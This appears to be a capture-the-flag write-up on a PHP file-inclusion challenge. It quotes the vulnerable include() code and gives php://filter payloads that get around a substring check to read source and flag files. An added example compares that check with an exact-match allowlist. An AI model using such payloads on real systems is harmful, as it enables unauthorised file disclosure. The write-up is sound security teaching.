Simple include() file inclusion and PHP pseudo-protocols

Open the page, click any of the options, and notice the URL:

/index.php?category=woofers

This suggests either SQL injection or file inclusion, so we use a PHP pseudo-protocol to read the file:

php://filter/read=convert.base64-encode/resource=index

This returns the source code (Base64-encoded by the filter):

<?php
  $file = $_GET['category'];
  
  if(isset($file))
  {
    if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ // the input must contain the string woofers, meowers, or index
      include ($file . '.php'); // ".php" is appended to the parameter
    }
    else{
      echo "Sorry, we currently only support woofers and meowers.";
    }
  }
?>

So as long as the input contains woofers, meowers, or index, it is passed to include(). We can therefore use the PHP pseudo-protocol again to read the file:

php://filter/read=convert.base64-encode/woofers/resource=flag
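
For comparison, an added example (not part of the original challenge code) that runs the page's substring check and an exact-match allowlist over the inputs shown above. The names ALLOWED_PAGES, legacy_check() and resolve_category() are hypothetical.

```php
<?php
// Added example, not the challenge's code. ALLOWED_PAGES, legacy_check()
// and resolve_category() are hypothetical names.

// Exact-match allowlist: user input selects a key, never a path.
const ALLOWED_PAGES = [
    'woofers' => 'woofers.php',
    'meowers' => 'meowers.php',
];

// The page's original test, reproduced for comparison: a substring match
// anywhere in the value is enough to reach include().
function legacy_check(string $file): bool
{
    return strpos($file, 'woofers') !== false
        || strpos($file, 'meowers') !== false
        || strpos($file, 'index');
}

// Hardened lookup: returns a fixed file name, or null for anything else.
function resolve_category(string $category): ?string
{
    return ALLOWED_PAGES[$category] ?? null;
}

// Inputs taken from the page above.
$samples = [
    'woofers',
    'php://filter/read=convert.base64-encode/resource=index',
    'php://filter/read=convert.base64-encode/woofers/resource=flag',
];

foreach ($samples as $input) {
    printf(
        "%-62s legacy=%-6s hardened=%s\n",
        $input,
        legacy_check($input) ? 'pass' : 'reject',
        resolve_category($input) ?? 'reject'
    );
}

// In the real handler the resolved name would be used as:
//   include __DIR__ . '/' . $page;   // only when $page !== null
```

All three inputs pass the legacy check, while the allowlist resolves only `woofers` and rejects both `php://filter` values, because the request value is never concatenated into the include path.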